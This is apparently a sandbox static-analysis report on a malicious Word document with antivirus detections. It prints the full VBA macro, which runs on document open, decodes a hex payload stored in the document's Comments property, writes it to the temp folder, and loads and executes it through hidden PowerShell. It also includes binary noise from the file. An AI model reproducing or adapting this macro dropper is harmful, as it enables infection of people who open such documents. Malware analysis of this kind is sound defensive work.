Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Submit, 0, 0, MSForms, CommandButton"
Sub Document_Open()
     Call Mycolor
End Sub


Private Sub Submit_Click()
With ActiveDocument.Tables(1).Cell(1, 1).Range
.Text = "Phone Number Not Found"

End With

End Sub

                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Submit, 0, 0, MSForms, CommandButton"
Sub Document_Open()
     Call Mycolor
End Sub


Private Sub Submit_Click()
With ActiveDocument.Tables(1).Cell(1, 1).Range
.Text = "Phone Number Not Found"

End With

End Sub

                                    

Original


                                        Attribute VB_Name = "Module1"
Private Function abc(ByVal he As String) As Byte()
    Dim n As Long
    Dim ic As Long
    Dim bArr() As Byte
    ic = Len(he)
    If (ic And 1) = 1 Then
        he = "0" & he
        ic = ic + 1
    End If
    
    ReDim bArr(ic \ 2 - 1)
    For n = 1 To ic Step 2
        
        bArr((n - 1) \ 2) = CByte("&H" & Mid$(he, n, 2))
    Next
    
    abc = bArr
End Function



Sub Mycolor()

Dim prop As DocumentProperty
    For Each prop In ActiveDocument.BuiltInDocumentProperties
        If prop.Name = "Comments" Then
            s = prop.Value
        End If
    Next
fnum = FreeFile
FName = Environ("TMP") & "\skfk.txt"
Open FName For Binary As #fnum
        Put #fnum, , abc(CStr(s))
    
Close #fnum


fr = "'" & Environ("TMP") & "\skfk.txt" & "'"
Result = "Powershell [Reflection.Assembly]::LoadFile(" & fr & ");$doo = New-Object Tysdf.Class1;$doo.sadkj()"
CreateObject("WScript.Shell").Run Result, 0, True


End Sub



                                    

Deobfuscated


                                        Attribute VB_Name = "Module1"
Private Function abc(ByVal he As String) As Byte()
    Dim n As Long
    Dim ic As Long
    Dim bArr() As Byte
    ic = Len(he)
    If (ic And 1) = 1 Then
        he = "0" & he
        ic = ic + 1
    End If
    
    ReDim bArr(ic \ 2 - 1)
    For n = 1 To ic Step 2
        
        bArr((n - 1) \ 2) = CByte("&H" & Mid$(he, n, 2))
    Next
    
    abc = bArr
End Function



Sub Mycolor()

Dim prop As DocumentProperty
    For Each prop In ActiveDocument.BuiltInDocumentProperties
        If prop.Name = "Comments" Then
            s = prop.Value
        End If
    Next
fnum = FreeFile
FName = Environ("TMP") & "\skfk.txt"
Open FName For Binary As #fnum
        Put #fnum, , abc(CStr(s))
    
Close #fnum


fr = "'" & Environ("TMP") & "\skfk.txt'"
Result = "Powershell [Reflection.Assembly]::LoadFile(" & fr & ");$doo = New-Object Tysdf.Class1;$doo.sadkj()"
CreateObject("WScript.Shell").Run Result, 0, True


End Sub



                                    
[Content_Types].xml
_rels/.rels
word/document.xml
etR~,nz
s[#n?`EU
,kdTZdu
.EJ69,
lrs&JU
6;;jw3S
-h/3}jp
Xoaxdl2J
y+,)O=
]z&Y@|
u |kt9W
@Jl)r14d
word/_rels/document.xml.rels
word/footnotes.xml
giJ l
l,0g:ey
word/endnotes.xml
word/header1.xml
rR(ssO
Z~E+)V
Gt-b@Aj
2otXVKG
8sIBAJk7j
4=s{UQ4)T
word/header2.xml
sR 9((
cRcxx_
Gt-b@Aj
2otXVGG
Q/8L$J
word/footer1.xml
word/footer2.xml
word/header3.xml
N3I;}<#d
't-b@Aj
8sIBAJk7j
mHlM9=
word/footer3.xml
W{-@Ot"E
word/vbaProject.bin
`4U'H[
lBlElC
|q4Zps*P
~Wm@s5V
-~% CS
><N={&
@"Y=8'
cG}hrd
&B}N_$
d!fRxUZ
>Azf?%
NOd~7Z
8V(1M3
?n6M95S|
0E9OAO
3:yhNw
_(/_T|
/kr5y|
word/media/image1.jpg
*I0Yf|
MZQDt`
9d V\
$MbbpS
(c'@TB
)^Y`VQ
ElJaf ur
[9k+NV;
@RI,RI!
zx9oSc
mJA?O+3R
|=rx$W0
WIjIdF
g"jO/f
1kA&D[4
{~+&1.
_O6z:z
$(&M/:
Y:n]U\
)-YRYl{Y
Ag,=Dvs
>Us}9F5
<nOc9<}{
IP:R1$
"23#04A$5%@
BP6CDF
VzenBD
aaaaaam[V
X[Q`QX
TxPj5dLs^
XXXXD
XD,,x!aamD,,"
za4,,&
XXXXXXYj
0,,,,,,,,&
(> *-n
j-XD <
L,,t!a
=e}%mE
'iT2/k
ca<d,#
.Mhsff
Uo=*M,
mR|@SuK
BxmOh}a
&du!{Z
'[f[fX
q26fS9
w]w0#j
ttr;;
'QM1Vf
}K.R>@
-R +?
%n7m,Q
31Wp:n
YYYYYD
eeeeeeeg
H\h1lA
%nYYY[
!nYYWf
H@NxN(
mXX%\i0P
"\1.&-
/(9n_Rv
u+l\vS
br190J
\1#^$j
0om!eW
dmyNq
{6aC#
6,XlRq
M8c]t5
XXXXXX^z
-GG00n
,6GMhF
:h(Vdf
````bbbC!
dfdddd>iH
[3336ff
J2FFFD
9ddddddK
FFLu]jtg'Bhu
AK{zHN)
FFLU2Y
P$Rq3b
H{aq+"
"~w}+h
22Fcw;
lXlDZ<
2fR._d
qmN7F(
;###4V
%RYv+Jw!&
,bbbbb``q
J)ZEIQ
z5<2::
2 "3Aq
EWe+v+}U
=F6VSc
ZrBjoz
UVQ\28Id
4I6Sri
-4\5X.
z)fY\g
-%sWWWW
v@%E,N,
%i+IV*
uuuuuut
qC}jWN
":Hgq)
oOuTeu3
E9@YaC[
7S1w]d
o*D*B"
c7a|7\ZPgh
su&:r]
5O(S-l
'RJvf3Q
2/e.k
RP8Idt
'e*w?"F
B4%bU!
!R!m~H
2Yti#Z?pOu
$?q6Et
iIOAdZ
a:*_z0
4v2FvK%
-vJLcU
B!%"VUf
)[V9IH
S4YAFq
Bf0ZP<
Q%dIk"v
26w&[d
hoCb|l
%^`x?d$z
(/2d)Sk
Y[F*)r
QV(VvA}
j4$L}3
J<d+l;
yCB z6>ND!
6#b%t|p
${E&bj
!!Jl6'
0 @h4 D
1()`]'G
PB!y!F
x~`!4P
-ket)i
4:Y.8,@
#E8&$P
W,}I#D
.QYS*]
ZrC$C!
KBjkr9Qy
8Fx@Tvx
jS!vaC
1,MCLAe}A
GZ$ocw_>Li*H
q[Z-bD
/6FsIB
s\yfD
1Nk"J*1xb]
%,QdSIOHipV
1xa;2t
q-4t4Byb
yc'2"Y
!SPd$PG2V%
ju0 E-
%tO0K,
i=N$}qd
$Blj$Uu
$J@qU-q
ib)cYt
&J2,iSP
d&mXQA
!1 AQ0aq
cDzcbq
"DR DA'
F%v)"{[
*D_cUT
AQa q0
9Z_|;v
lpJ|omj
~?Vc
W^/!wq`
!1AQaq
P6<DZ1
)A+iX2
1&ri't&
yoi)TH
{B&A-)
\RcKLAv
Du)'8!
fr51,$
LqT#lGR
bP`aG1r
paE^jf
s<"a|F
gb;=CHY
5"z|#
MDrk))
X(aASq
aip@P6mp&
vpFx~X?
S/v}ZG
Y{bgSnfu}
=1-iMX
*XCVh+
ov5*h'E
`tAIYJ+
`/s\f>
R6W0~p"X
LUuQ!x
#fpg~ezF
GqjX!W
36-$9L
|AZ%Kn
_19@ZP
+ {}JK
j.g3H$B
v.7C4*
!$vb1g)h
pqX%l7
`?P.Mj
Ah(t
Yu>& G
U/Tw-{
qusFai
c2zF.%
3Gu1qm
/]91uh
gLZZ-g
d<R<(|J
@fY[&tb
&80\TG
]1*:AN5
S$)pv,
*Hw{bSq
pYlnff>
LFM\Qd(
K*S?P.!X
JEUJk'
KGn.Lg
j^m4)h
r @^@AU{
auG'PH
5p%Au
FD} d
gL%9A-,
U1sl>`
fVwCB
@g24!i#j
3:\zAT
pP.oqP
word/media/image2.wmfl
oJ^kvF6M
word/theme/theme1.xml
_N?>}
zY(6i4[
word/_rels/vbaProject.bin.relsl
-\Ya;>>
word/vbaData.xml
Q]hUU@
? f$<>E?&
word/settings.xml
@{?Y`e
epzXL2{
word/styles.xml
X,S~6z
D{{Ntx
KItlm3
On[U/O
Y%7,OzZ
Pz:1xa
word/webSettings.xml
word/activeX/activeX1.xmld
word/activeX/activeX1.bin
word/fontTable.xml
docProps/core.xml
OmSOVu
g|D'i
E8wA+9R
2.9#Q
docProps/app.xml
word/activeX/_rels/activeX1.xml.relsl
>OO/`
[Content_Types].xmlPK
_rels/.relsPK
word/document.xmlPK
word/_rels/document.xml.relsPK
word/footnotes.xmlPK
word/endnotes.xmlPK
word/header1.xmlPK
word/header2.xmlPK
word/footer1.xmlPK
word/footer2.xmlPK
word/header3.xmlPK
word/footer3.xmlPK
word/vbaProject.binPK
word/media/image1.jpgPK
word/media/image2.wmfPK
word/theme/theme1.xmlPK
word/_rels/vbaProject.bin.relsPK
word/vbaData.xmlPK
word/settings.xmlPK
word/styles.xmlPK
word/webSettings.xmlPK
word/activeX/activeX1.xmlPK
word/activeX/activeX1.binPK
word/fontTable.xmlPK
docProps/core.xmlPK
docProps/app.xmlPK
word/activeX/_rels/activeX1.xml.relsPK
Antivirus Signature
Bkav Clean
Lionic Trojan.MSWord.PwShell.4!c
Elastic malicious (high confidence)
MicroWorld-eScan VB.Heur2.PwShell.2.59A9EA73.Gen
FireEye VB.Heur2.PwShell.2.59A9EA73.Gen
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
Trustlook Clean
BitDefender VB.Heur2.PwShell.2.59A9EA73.Gen
K7GW Clean
K7AntiVirus Clean
Arcabit Clean
Baidu Clean
Cyren Clean
Symantec ISB.Downloader!gen84
ESET-NOD32 a variant of Generik.GRJAPBT
TrendMicro-HouseCall Clean
Avast Other:Malware-gen [Trj]
ClamAV Clean
Kaspersky UDS:DangerousObject.Multi.Generic
Alibaba TrojanDownloader:VBA/Obfuscation.A
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
ViRobot Clean
Tencent Heur.Macro.Generic.a.7f90e260
Ad-Aware Clean
TACHYON Suspicious/WOX.Obfus.Gen.8
Emsisoft VB.Heur2.PwShell.2.59A9EA73.Gen (B)
Comodo Clean
F-Secure Clean
DrWeb modification of W97M.Suspicious.1
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Downloader.cc
CMC Clean
Sophos Clean
Ikarus Win32.Outbreak
GData VB.Heur2.PwShell.2.59A9EA73.Gen
Jiangmin Clean
Avira Clean
Antiy-AVL Trojan/Generic.ASMacro.2D5FB
Kingsoft Clean
Gridinsoft Clean
Microsoft Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Downloader.Script.Generic
Avast-Mobile Clean
Cynet Clean
AhnLab-V3 Clean
Acronis Clean
McAfee RDN/Generic.dx
MAX malware (ai score=80)
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
SentinelOne Static AI - Suspicious OPENXML
MaxSecure Clean
Fortinet VBA/Agent.32EE!tr
BitDefenderTheta Clean
AVG Other:Malware-gen [Trj]
Panda Clean
No IRMA results available.